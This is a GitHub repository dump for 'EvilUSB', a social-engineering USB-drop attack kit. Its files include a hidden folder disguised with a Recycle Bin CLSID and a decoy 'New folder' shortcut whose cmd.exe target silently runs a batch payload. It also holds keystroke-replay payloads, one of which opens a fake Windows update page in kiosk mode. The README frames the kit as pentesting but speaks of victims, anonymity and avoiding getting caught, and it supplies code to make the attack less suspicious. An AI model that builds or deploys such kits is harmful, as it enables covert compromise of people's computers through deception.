├── Example ├── .Recycle Bin │ ├── MacroCMD.exe │ ├── Record macro.bat │ ├── brown-fox.payload │ ├── fake-update.payload │ └── payload.bat ├── Debug Payload.lnk ├── New folder.lnk ├── New folder │ └── secrets.txt ├── README.md └── Toggle visibility.bat └── README.md /Example/.Recycle Bin/MacroCMD.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tardummy01/EvilUSB/26022c7fbbbd40157a1d05b5c84f6510a325a8cc/Example/.Recycle Bin/MacroCMD.exe -------------------------------------------------------------------------------- /Example/.Recycle Bin/Record macro.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set /p "recording=Give macro a name: " 3 | echo Enable mouse movements? 4 | choice /c YN 5 | IF ERRORLEVEL 1 set "switch= " 6 | IF ERRORLEVEL 2 set "switch=/dm /dc" 7 | echo Beginning to record... 8 | echo [TIP] Press {INSERT} to stop recording 9 | echo. 10 | echo. 11 | timeout /nobreak /t 10 12 | echo. 13 | echo [RECORDING] PRESS INSERT TO STOP! 14 | MacroCMD.exe /r /ek:45 %switch% %recording%.payload -------------------------------------------------------------------------------- /Example/.Recycle Bin/brown-fox.payload: -------------------------------------------------------------------------------- 1 | KeyboardEvent LWIN-Down 2 | Delay 399 3 | KeyboardEvent R-Down 4 | Delay 141 5 | KeyboardEvent R-Up 6 | Delay 20 7 | KeyboardEvent LWIN-Up 8 | Delay 384 9 | KeyboardEvent LSHIFT-Down 10 | Delay 0 11 | KeyboardEvent SHIFT-Down 12 | Delay 184 13 | KeyboardEvent SHIFT-Up 14 | Delay 1 15 | KeyboardEvent LSHIFT-Up 16 | Delay 303 17 | KeyboardEvent N-Down 18 | Delay 120 19 | KeyboardEvent O-Down 20 | Delay 40 21 | KeyboardEvent N-Up 22 | Delay 104 23 | KeyboardEvent O-Up 24 | Delay 32 25 | KeyboardEvent T-Down 26 | Delay 65 27 | KeyboardEvent T-Up 28 | Delay 144 29 | KeyboardEvent E-Down 30 | Delay 112 31 | KeyboardEvent E-Up 32 | Delay 56 33 | KeyboardEvent P-Down 34 | Delay 120 35 | KeyboardEvent P-Up 36 | Delay 8 37 | KeyboardEvent A-Down 38 | Delay 128 39 | KeyboardEvent A-Up 40 | Delay 0 41 | KeyboardEvent D-Down 42 | Delay 87 43 | KeyboardEvent D-Up 44 | Delay 72 45 | KeyboardEvent RETURN-Down 46 | Delay 90 47 | KeyboardEvent RETURN-Up 48 | Delay 290 49 | KeyboardEvent LSHIFT-Down 50 | Delay 0 51 | KeyboardEvent SHIFT-Down 52 | Delay 253 53 | KeyboardEvent T-Down 54 | Delay 81 55 | KeyboardEvent T-Up 56 | Delay 23 57 | KeyboardEvent SHIFT-Up 58 | Delay 0 59 | KeyboardEvent LSHIFT-Up 60 | Delay 57 61 | KeyboardEvent H-Down 62 | Delay 104 63 | KeyboardEvent E-Down 64 | Delay 0 65 | KeyboardEvent H-Up 66 | Delay 87 67 | KeyboardEvent E-Up 68 | Delay 40 69 | KeyboardEvent SPACE-Down 70 | Delay 72 71 | KeyboardEvent SPACE-Up 72 | Delay 121 73 | KeyboardEvent Q-Down 74 | Delay 111 75 | KeyboardEvent Q-Up 76 | Delay 72 77 | KeyboardEvent U-Down 78 | Delay 88 79 | KeyboardEvent I-Down 80 | Delay 40 81 | KeyboardEvent U-Up 82 | Delay 113 83 | KeyboardEvent C-Down 84 | Delay 0 85 | KeyboardEvent I-Up 86 | Delay 87 87 | KeyboardEvent C-Up 88 | Delay 114 89 | KeyboardEvent K-Down 90 | Delay 94 91 | KeyboardEvent K-Up 92 | Delay 152 93 | KeyboardEvent SPACE-Down 94 | Delay 65 95 | KeyboardEvent SPACE-Up 96 | Delay 167 97 | KeyboardEvent B-Down 98 | Delay 120 99 | KeyboardEvent B-Up 100 | Delay 32 101 | KeyboardEvent R-Down 102 | Delay 73 103 | KeyboardEvent R-Up 104 | Delay 185 105 | KeyboardEvent W-Down 106 | Delay 33 107 | KeyboardEvent W-Up 108 | Delay 358 109 | KeyboardEvent BACK-Down 110 | Delay 81 111 | KeyboardEvent BACK-Up 112 | Delay 55 113 | KeyboardEvent O-Down 114 | Delay 113 115 | KeyboardEvent O-Up 116 | Delay 0 117 | KeyboardEvent W-Down 118 | Delay 62 119 | KeyboardEvent W-Up 120 | Delay 96 121 | KeyboardEvent N-Down 122 | Delay 89 123 | KeyboardEvent N-Up 124 | Delay 32 125 | KeyboardEvent SPACE-Down 126 | Delay 72 127 | KeyboardEvent SPACE-Up 128 | Delay 176 129 | KeyboardEvent F-Down 130 | Delay 116 131 | KeyboardEvent F-Up 132 | Delay 0 133 | KeyboardEvent O-Down 134 | Delay 101 135 | KeyboardEvent O-Up 136 | Delay 31 137 | KeyboardEvent X-Down 138 | Delay 88 139 | KeyboardEvent X-Up 140 | Delay 136 141 | KeyboardEvent SPACE-Down 142 | Delay 80 143 | KeyboardEvent SPACE-Up 144 | Delay 64 145 | KeyboardEvent J-Down 146 | Delay 81 147 | KeyboardEvent J-Up 148 | Delay 112 149 | KeyboardEvent U-Down 150 | Delay 128 151 | KeyboardEvent U-Up 152 | Delay 103 153 | KeyboardEvent M-Down 154 | Delay 113 155 | KeyboardEvent P-Down 156 | Delay 24 157 | KeyboardEvent M-Up 158 | Delay 103 159 | KeyboardEvent S-Down 160 | Delay 24 161 | KeyboardEvent P-Up 162 | Delay 40 163 | KeyboardEvent S-Up 164 | Delay 32 165 | KeyboardEvent SPACE-Down 166 | Delay 65 167 | KeyboardEvent SPACE-Up 168 | Delay 56 169 | KeyboardEvent O-Down 170 | Delay 120 171 | KeyboardEvent V-Down 172 | Delay 320 173 | KeyboardEvent O-Up 174 | Delay 0 175 | KeyboardEvent V-Up 176 | Delay 8 177 | KeyboardEvent SPACE-Down 178 | Delay 50 179 | KeyboardEvent SPACE-Up 180 | Delay 302 181 | KeyboardEvent BACK-Down 182 | Delay 90 183 | KeyboardEvent BACK-Up 184 | Delay 0 185 | KeyboardEvent R-Down 186 | Delay 70 187 | KeyboardEvent R-Up 188 | Delay 31 189 | KeyboardEvent SPACE-Down 190 | Delay 49 191 | KeyboardEvent SPACE-Up 192 | Delay 63 193 | KeyboardEvent T-Down 194 | Delay 80 195 | KeyboardEvent T-Up 196 | Delay 40 197 | KeyboardEvent H-Down 198 | Delay 97 199 | KeyboardEvent E-Down 200 | Delay 24 201 | KeyboardEvent H-Up 202 | Delay 64 203 | KeyboardEvent E-Up 204 | Delay 280 205 | KeyboardEvent SPACE-Down 206 | Delay 96 207 | KeyboardEvent SPACE-Up 208 | Delay 79 209 | KeyboardEvent L-Down 210 | Delay 129 211 | KeyboardEvent L-Up 212 | Delay 33 213 | KeyboardEvent A-Down 214 | Delay 79 215 | KeyboardEvent A-Up 216 | Delay 136 217 | KeyboardEvent Z-Down 218 | Delay 113 219 | KeyboardEvent Y-Down 220 | Delay 0 221 | KeyboardEvent Z-Up 222 | Delay 87 223 | KeyboardEvent Y-Up 224 | Delay 49 225 | KeyboardEvent SPACE-Down 226 | Delay 71 227 | KeyboardEvent SPACE-Up 228 | Delay 90 229 | KeyboardEvent D-Down 230 | Delay 86 231 | KeyboardEvent D-Up 232 | Delay 17 233 | KeyboardEvent O-Down 234 | Delay 127 235 | KeyboardEvent O-Up 236 | Delay 117 237 | KeyboardEvent G-Down 238 | Delay 29 239 | KeyboardEvent G-Up 240 | -------------------------------------------------------------------------------- /Example/.Recycle Bin/fake-update.payload: -------------------------------------------------------------------------------- 1 | Delay 400 2 | KeyboardEvent LWIN-Down 3 | Delay 10 4 | KeyboardEvent R-Down 5 | Delay 30 6 | KeyboardEvent R-Up 7 | Delay 0 8 | KeyboardEvent LWIN-Up 9 | Delay 550 10 | KeyboardEvent I-Down 11 | Delay 10 12 | KeyboardEvent I-Up 13 | Delay 10 14 | KeyboardEvent E-Down 15 | Delay 10 16 | KeyboardEvent E-Up 17 | Delay 10 18 | KeyboardEvent X-Down 19 | Delay 10 20 | KeyboardEvent X-Up 21 | Delay 10 22 | KeyboardEvent P-Down 23 | Delay 10 24 | KeyboardEvent P-Up 25 | Delay 10 26 | KeyboardEvent L-Down 27 | Delay 10 28 | KeyboardEvent L-Up 29 | Delay 10 30 | KeyboardEvent O-Down 31 | Delay 10 32 | KeyboardEvent O-Up 33 | Delay 10 34 | KeyboardEvent R-Down 35 | Delay 10 36 | KeyboardEvent R-Up 37 | Delay 10 38 | KeyboardEvent E-Down 39 | Delay 10 40 | KeyboardEvent E-Up 41 | Delay 10 42 | KeyboardEvent SPACE-Down 43 | Delay 10 44 | KeyboardEvent SPACE-Up 45 | Delay 10 46 | KeyboardEvent OEM_MINUS-Down 47 | Delay 10 48 | KeyboardEvent OEM_MINUS-Up 49 | Delay 10 50 | KeyboardEvent K-Down 51 | Delay 10 52 | KeyboardEvent K-Up 53 | Delay 10 54 | KeyboardEvent SPACE-Down 55 | Delay 10 56 | KeyboardEvent SPACE-Up 57 | Delay 10 58 | KeyboardEvent H-Down 59 | Delay 10 60 | KeyboardEvent H-Up 61 | Delay 10 62 | KeyboardEvent T-Down 63 | Delay 10 64 | KeyboardEvent T-Up 65 | Delay 10 66 | KeyboardEvent T-Down 67 | Delay 10 68 | KeyboardEvent T-Up 69 | Delay 10 70 | KeyboardEvent P-Down 71 | Delay 10 72 | KeyboardEvent P-Up 73 | Delay 10 74 | KeyboardEvent LSHIFT-Down 75 | Delay 10 76 | KeyboardEvent SHIFT-Down 77 | Delay 10 78 | KeyboardEvent OEM_1-Down 79 | Delay 10 80 | KeyboardEvent OEM_1-Up 81 | Delay 10 82 | KeyboardEvent LSHIFT-Up 83 | Delay 10 84 | KeyboardEvent SHIFT-Up 85 | Delay 10 86 | KeyboardEvent OEM_2-Down 87 | Delay 10 88 | KeyboardEvent OEM_2-Up 89 | Delay 10 90 | KeyboardEvent OEM_2-Down 91 | Delay 10 92 | KeyboardEvent OEM_2-Up 93 | Delay 10 94 | KeyboardEvent F-Down 95 | Delay 10 96 | KeyboardEvent F-Up 97 | Delay 10 98 | KeyboardEvent A-Down 99 | Delay 10 100 | KeyboardEvent A-Up 101 | Delay 10 102 | KeyboardEvent K-Down 103 | Delay 10 104 | KeyboardEvent K-Up 105 | Delay 10 106 | KeyboardEvent E-Down 107 | Delay 10 108 | KeyboardEvent E-Up 109 | Delay 10 110 | KeyboardEvent U-Down 111 | Delay 10 112 | KeyboardEvent U-Up 113 | Delay 10 114 | KeyboardEvent P-Down 115 | Delay 10 116 | KeyboardEvent P-Up 117 | Delay 10 118 | KeyboardEvent D-Down 119 | Delay 10 120 | KeyboardEvent D-Up 121 | Delay 10 122 | KeyboardEvent A-Down 123 | Delay 10 124 | KeyboardEvent A-Up 125 | Delay 10 126 | KeyboardEvent T-Down 127 | Delay 10 128 | KeyboardEvent T-Up 129 | Delay 10 130 | KeyboardEvent E-Down 131 | Delay 10 132 | KeyboardEvent E-Up 133 | Delay 10 134 | KeyboardEvent OEM_PERIOD-Down 135 | Delay 10 136 | KeyboardEvent OEM_PERIOD-Up 137 | Delay 10 138 | KeyboardEvent N-Down 139 | Delay 10 140 | KeyboardEvent N-Up 141 | Delay 10 142 | KeyboardEvent E-Down 143 | Delay 10 144 | KeyboardEvent E-Up 145 | Delay 10 146 | KeyboardEvent T-Down 147 | Delay 10 148 | KeyboardEvent T-Up 149 | Delay 10 150 | KeyboardEvent OEM_2-Down 151 | Delay 10 152 | KeyboardEvent OEM_2-Up 153 | Delay 10 154 | KeyboardEvent W-Down 155 | Delay 10 156 | KeyboardEvent W-Up 157 | Delay 10 158 | KeyboardEvent I-Down 159 | Delay 10 160 | KeyboardEvent I-Up 161 | Delay 10 162 | KeyboardEvent N-Down 163 | Delay 10 164 | KeyboardEvent N-Up 165 | Delay 10 166 | KeyboardEvent 1-Down 167 | Delay 10 168 | KeyboardEvent 1-Up 169 | Delay 10 170 | KeyboardEvent 0-Down 171 | Delay 10 172 | KeyboardEvent 0-Up 173 | Delay 10 174 | KeyboardEvent U-Down 175 | Delay 10 176 | KeyboardEvent U-Up 177 | Delay 10 178 | KeyboardEvent OEM_2-Down 179 | Delay 10 180 | KeyboardEvent OEM_2-Up 181 | Delay 10 182 | KeyboardEvent I-Down 183 | Delay 10 184 | KeyboardEvent I-Up 185 | Delay 10 186 | KeyboardEvent N-Down 187 | Delay 10 188 | KeyboardEvent N-Up 189 | Delay 10 190 | KeyboardEvent D-Down 191 | Delay 10 192 | KeyboardEvent D-Up 193 | Delay 10 194 | KeyboardEvent E-Down 195 | Delay 10 196 | KeyboardEvent E-Up 197 | Delay 10 198 | KeyboardEvent X-Down 199 | Delay 10 200 | KeyboardEvent X-Up 201 | Delay 10 202 | KeyboardEvent OEM_PERIOD-Down 203 | Delay 10 204 | KeyboardEvent OEM_PERIOD-Up 205 | Delay 10 206 | KeyboardEvent H-Down 207 | Delay 10 208 | KeyboardEvent H-Up 209 | Delay 10 210 | KeyboardEvent T-Down 211 | Delay 10 212 | KeyboardEvent T-Up 213 | Delay 10 214 | KeyboardEvent M-Down 215 | Delay 10 216 | KeyboardEvent M-Up 217 | Delay 10 218 | KeyboardEvent L-Down 219 | Delay 10 220 | KeyboardEvent L-Up 221 | Delay 13 222 | KeyboardEvent RETURN-Down 223 | Delay 26 224 | KeyboardEvent RETURN-Up 225 | -------------------------------------------------------------------------------- /Example/.Recycle Bin/payload.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | :: Set payload name 3 | set "payload-name=fake-update" 4 | 5 | :: (Un)comment to prevent Explorer window from opening 6 | ::explorer "%cd%\New Folder" 7 | 8 | 9 | :: CD into Recycle Bin directory 10 | cd /d %~dp0 11 | 12 | :: Playback MacroCMD commands 13 | MacroCMD.exe /p %payload-name%.payload -------------------------------------------------------------------------------- /Example/Debug Payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tardummy01/EvilUSB/26022c7fbbbd40157a1d05b5c84f6510a325a8cc/Example/Debug Payload.lnk -------------------------------------------------------------------------------- /Example/New folder.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tardummy01/EvilUSB/26022c7fbbbd40157a1d05b5c84f6510a325a8cc/Example/New folder.lnk -------------------------------------------------------------------------------- /Example/New folder/secrets.txt: -------------------------------------------------------------------------------- 1 | This folder will popup once they click the payload (Can be disabled in script) -------------------------------------------------------------------------------- /Example/README.md: -------------------------------------------------------------------------------- 1 | ##How to create the shortcut (.lnk) 2 | 1. Create a shortcut to any file in the root folder 3 | 2. Go to properties and change the `Target` to 4 | 5 |
6 | 7 | C:\Windows\System32\cmd.exe /c "explorer "%cd%\New Folder"&if exist ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}\" (".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}\payload.bat") else (if exist ".Recycle Bin\" (".Recycle Bin\payload.bat"))" 8 | 9 | **This basically opens the `New Folder` in explorer and then checks to see if the `.Recycle Bin` folder exists and relatively executes it.** 10 | 11 | Make sure that the `Open in` box is left blank -------------------------------------------------------------------------------- /Example/Toggle visibility.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | if exist ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}\" ( 3 | echo Unhiding... 4 | attrib -h -s ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}" 5 | attrib -h -s "New Folder" 6 | ren ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}" ".Recycle Bin" 7 | ) else ( 8 | if exist ".Recycle Bin\" ( 9 | echo Hiding... 10 | ren ".Recycle Bin\" ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}" 11 | attrib +h +s ".Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}" 12 | attrib +h +s "New Folder" 13 | ) 14 | ) 15 | echo. 16 | echo Press any key to exit 17 | pause >nul -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # EvilUSB 2 | 3 | These are some EvilUSB Sticks... 4 | 5 | ![EvilUSB Sticks](http://i.imgur.com/wDYmoYJ.jpg) 6 | 7 | 8 | ## What is EvilUSB? 9 | 10 | EvilUSB is a pentesting USB Device that is recognized by the target Computer as a regular USB Flash Drive. This innocent-looking Social Engineering device can be placed at anyone's desk/mailbox, and as soon as they get hold of it and plug it into their Computer, just like any average user, they would attempt to browse the USB Flash Drive and take look at the contents of the Drive. From there on, they're just a click away from getting infected. 11 | 12 | ## How does it work? 13 | 14 | ![EvilUSB Drive](https://i.gyazo.com/b9ebdf1cd99fa32d31148ce185f34760.png) 15 | 16 | Each EvilUSB comes with the following files: 17 | ``` 18 | EvilUSB (D:) 19 | |-- % [H] 20 | | |-- evil.bat || .exe [H] 21 | +-- New folder.lnk 22 | ``` 23 | Notes: 24 | * `%: Invisible (U+180E) Space Charcater` 25 | * `[H]: Hidden` 26 | 27 | With the % Folder being [H]idden, it will not be visible in Windows explorer by default. That means, the only file visible to the user will be the Shortcut `New folder.lnk`, which is linked to the malicious file, `/%/evil.bat || .exe`. `New folder.lnk` will have gotten the Icon of a Folder, hence the name of the Shortcut file. That makes the "New folder" look identical to an actual, real folder. So, as soon as the target attempts to open the "folder", he will have basically run the Shortcut file, which is linked to the malicious file, `evil.exe`/`evil.bat`, and from there on he's infected. 28 | 29 | ### Disguising the Attack 30 | 31 | As soon as the user opens the "folder", he will notice that no folder has been opened. This is a factor that would increase the suspiciousness of EvilUSB. For that reason, in the very first lines of the malicious evil.bat File, it would be a good idea to include the following lines: 32 | ``` 33 | @echo off 34 | mkdir ../New folder&cd ../New folder&start . 35 | ``` 36 | 37 | The purpose of the above lines is to make the Attack less suspicious. For that matter, below is the explanation of the above batch code: 38 | * `&`: Command seperator that allows next command to be executed regardless of the previous command-execution's success/failure 39 | * `@echo off`: Disable output 40 | * `mkdir ../New folder`: Create new folder in root directory of the Drive (D:/) called "New folder" 41 | * `cd ../New folder`: Change directory to the newly created folder 42 | * `start .`: Open the newly created folder 43 | 44 | ## Can this be achieved with the use of any USB Flash Drive? 45 | 46 | Technically, yes. 47 | 48 | ## Should you use your pre-owned USB Flash Drives for this Attack? 49 | 50 | Definitely not. Considering you'll be sacrificing your USB Flash Drive, it is not a good idea to waste tens of dollars per attack. If you don't want to risk losing your USB Stick and would attempt to get the USB Flash Drive back from your target Victim, you are putting your anonymity in risk and the chances of you getting caught are just as high. 51 | 52 | ## So, what should I do if I want to perform this attack "for educational purposes"? 53 | 54 | Since this Social Engineering attack does not require a USB Flash Drive with over 64MB Capacity Storage, it is recommended that you order a couple of some cheap 64MB USB Flash Drives. (See below) 55 | 56 | ## Suggestions 57 | 58 | I'm open to your suggestions, feedback and new ideas. There's much more to come to this Project, and I'm happy to announce that I finally got done publishing this idea and creating a Proof-of-Concept (PoC) EvilUSB. 59 | 60 | ## Credits 61 | 62 | EvilUSB was created by [@0xCoto](https://github.com/0xCoto). 63 | --------------------------------------------------------------------------------